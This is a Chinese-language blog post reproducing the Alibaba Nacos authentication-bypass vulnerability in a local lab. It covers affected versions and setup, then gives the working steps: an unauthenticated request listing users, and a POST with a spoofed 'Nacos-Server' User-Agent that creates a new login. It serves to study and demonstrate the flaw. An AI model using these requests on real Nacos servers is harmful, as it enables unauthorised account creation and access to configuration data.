漏洞复现 - - - Alibaba Nacos权限认证绕过

举报
yd_217360808 发表于 2022/10/10 23:17:54 2022/10/10
【摘要】 简单介绍了Alibaba Nacos权限认证绕过的方法,详细介绍了漏洞复现的过程。

1、什么是Nacos(Dynamic Naming and Configuration Service)

Nacos动态域名和配置服务,英文缩写是Dynamic Naming and Configuration Service, 取的Naming的前两个字母,Configuration的前2个字母,以及Service的首字母组成的。我了解到NACOS是在2018年7月,当时正好发布了该产品,由于项目一直在用Consul(也花了一段时间折腾),新产品毕竟有个大家使用的认同过程,所以当时只是做了了解,一直到今年下半年阿里云的朋友推荐我,说最近阿里云企业级Nacos在公测,目前是免费的,12月份开始商业化,正好加之要开始做新的项目,好奇心和热情又回到我这个不惑之年的程序猿身上了,于是马上打开了NACOS官网体验,首页上有企业版Nacos的链接(如下图),图正中是NACOS的官方介绍,“一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台”,目前最新的是V1.1.4版本,2019年10月24日发布的。

2.Alibaba Nacos漏洞概述

nacos的认证绕过安全漏洞,在nacos开启了鉴权后,依然能绕过鉴权访问任何http接口。

在默认情况下,nacos需要通过修改application.properties配置文件或添加JVM启动变量-Dnacos.core.auth.enabled=true即可开启鉴权功能 (参考:https://nacos.io/en-us/docs/auth.html)

但在开启鉴权后,我发现代码中,任然可以在某种情况下绕过认证,调用任何接口,通过该漏洞,我可以绕过鉴权,做到:

调用添加用户接口,添加新用户(POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test),然后使用新添加的用户登录console,访问、修改、添加数据。

3.影响范围

  • 2.0.0-ALPHA.1
  • 1.x.x

4.环境搭建

下载地址

https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1

 Linux搭建

下载后解压

tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz

开始搭建

./startup.sh -m standalone

Windows搭建

如果是单机启动不是集群启动的话,修改一下bin目录下startup.cmd文件的启动模式,修改为单机启动

点击startup.cmd启动

localhost:8848/nacos/index.html

默认用户名密码:nacos/nacos

出现Nacos页面为成功

5 漏洞复现

1.访问

在没有登陆情况下浏览器访问如下接口,获取用户列表

http://localhost:8848/nacos/v1/auth/users?pageNo=1&pageSize=1

查看到了用户列表 

可以看到用一个用户nacos

利用用户漏洞

http://localhost:8848/nacos/v1/auth/users

导致:所需的int参数'pageNo'不存在;

2.Max HackBar

在火狐浏览器中搜索插件Max HackBar

修改为POST请求

usename=test&password=test

修改U-A头:Nacos-Server

点击Execution输入,返回码200,用户创建成功!

返回登录页面输入test /test

 登录成功!!!!

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。